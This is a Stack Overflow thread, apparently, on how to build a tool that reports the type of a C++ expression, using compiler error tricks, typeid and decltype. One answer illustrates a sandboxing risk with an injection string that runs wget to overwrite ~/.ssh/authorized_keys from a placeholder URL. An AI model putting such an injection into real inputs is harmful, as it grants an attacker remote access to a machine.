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I'm interested in writing a tool for teaching purposes that evaluates C++ expressions and prints their types. Essentially, my thinking is that my students could type in any expression, and the program would echo back the type of the expression. Is there an existing tool that already does this? If not, is there a pretty easy way to do it by integrating with an existing compiler and calling into its debugger or API? I've been told, for example, that Clang has a fairly complete compiler API, perhaps there's some way to just pass a string into Clang along with the appropriate include directives and have it spit out a type?

I realize that this is potentially a huge project if there's nothing close to this existing today. I just thought it would have significant educational value, so it seemed like it was worth checking.

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1  
You'd basically have to write an interactive C++ CLI interface. (Not to be confused with a C++/CLI interface, of course :-) .) –  Kerrek SB Sep 29 '11 at 18:11
    
cint may help, although it's not so standard-compliant (actually, I hate it for several reasons). –  Matteo Italia Sep 29 '11 at 18:55

2 Answers 2

up vote 6 down vote accepted

I came up with an answer inspired by Ben Voigt's comments. Just make a bug and let the compiler tell you the type which caused it:

template <typename T> void foo(T); // No definition

int main() {
  foo(1 + 3.0);
}

Result:

In function `main':
prog.cpp:(.text+0x13): undefined reference to `void foo<double>(double)'

Also, since you execute nothing but the compiler, you're pretty safe. No sandboxing needed, really. If you get anything other than "undefined reference to void foo<T>(T)", it wasn't an expression.

[edit] How would you put this into a tool? Simple, with macro's

// TestHarness.cpp
// Slight variation to make it a compile error
template <typename T> void foo(T) { typename T::bar t = T::bar ; }

int main() {
  foo(EXPR);
}

Now compile with $(CC) /D=(EXPR) TestHarness.cpp. Saves you from rebuilding the input file every time.

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1  
The error comes from the linker, not compiler, but this is brilliant! +1 I think you might be able to get the compile step to fail instead, by making the template a private member function. –  Ben Voigt Sep 30 '11 at 21:51
    
Yeah, eliminating the linker is potentially even faster. I came up with this: ideone.com/Yu0nx . An error that's type-dependent will be detected in phase 2 name lookup, and therefore have the expression type in the error message (on reasonable compilers). –  MSalters Sep 30 '11 at 22:04
    
You can supply the source code to g++ on stdin, no source file is needed, nor a macro. autotools (automake, autoconf) uses this technique extensively. –  Ben Voigt Sep 30 '11 at 22:14

Improving yet more on MSalter's improvement:

class X {
  template <typename T> static void foo(T) {}
};

int main() {
  X::foo( $user_code );
}

Result (with $user_code = "1 + 3.0"):

prog.cpp: In function ‘int main()’:
prog.cpp:2: error: ‘static void X::foo(T) [with T = double]’ is private
prog.cpp:6: error: within this context

This avoids the link step.


Original answer:

C++ has the typeid keyword. Conceptually, you just need to stick the user's expression into some boilerplate like:

extern "C" int puts(const char *s);
#include <typeinfo>

int main(void)
{
    const type_info& the_type = typeid( $user_code );
    puts(the_type.name());
}

And then pass that source file to the compiler, and run it to get the answer.

Practically, it's going to be difficult to avoid running malicious code. You'd need to use a sandbox of some type. Or be really really careful to make sure that there aren't mismatched parentheses (you do know what trigraphs are, right?).

yes I'm aware that the argument of typeid isn't evaluated. But let $usercode be 1); system("wget -O ~/.ssh/authorized_keys some_url" !

A better option would be to avoid running the program. With a framework (requires C++11) like:

extern "C" decltype( $user_code )* the_value = 0;

You could run the compiler with the option to generate debug data, then use e.g. a dwarf2 reader library and get the symbolic type information associated with the_value, then remove one level of pointer.

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1  
You need to include the typeinfo header for that, and the operator’s name is typeid, not typeof. –  Konrad Rudolph Sep 29 '11 at 18:14
2  
@KerrekSB: If he's crafty, he can have a program that writes BenVoight's program, then calls the compiler, then runs it and displays the results :D –  Mooing Duck Sep 29 '11 at 18:17
1  
@KerrekSB: No interpreter needed. If your compiler is reasonably fast (and on this small file it should be), then you can go through a compile/execute cycle for each new expression, and still be "interactive". –  Ben Voigt Sep 29 '11 at 18:54
1  
For this interactive case, the compilation overhead imposed by <iostream> would be quite significant. I'd even suggest fputs(). –  MSalters Sep 30 '11 at 7:52
2  
@Ben: Smart idea, but you stopped a bit too early. Compilers can perfectly well output that information themselves, if you poke them where it hurts ;) See my answer. –  MSalters Sep 30 '11 at 21:44

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